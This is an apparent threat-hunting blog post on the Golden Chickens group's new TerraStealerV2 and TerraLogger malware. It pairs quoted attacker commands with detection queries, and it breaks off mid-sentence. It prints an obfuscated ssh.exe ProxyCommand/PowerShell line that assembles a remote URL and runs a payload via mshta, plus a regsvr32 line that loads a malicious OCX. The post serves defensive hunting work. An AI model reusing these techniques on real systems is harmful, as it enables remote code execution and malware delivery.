123. Hunting for Golden Chickens' New Malware
Hello everyone! Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger . Both were attributed to the threat actor known as Golden Chickens . The adversary provides tools to other criminals operating a Malware-as-a-Service (MaaS) platform. I've looked through the report, and (as always) caught a few detection and hunting opportunities. For example, the adversary abused ssh.exe for proxying PowerShell execution: ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')" We can hunt for similar activity using the following query: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand" Next thing, abusing regsvr32.exe for executing a malicious OCX file: regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx We can use the following query to hunt for OCX...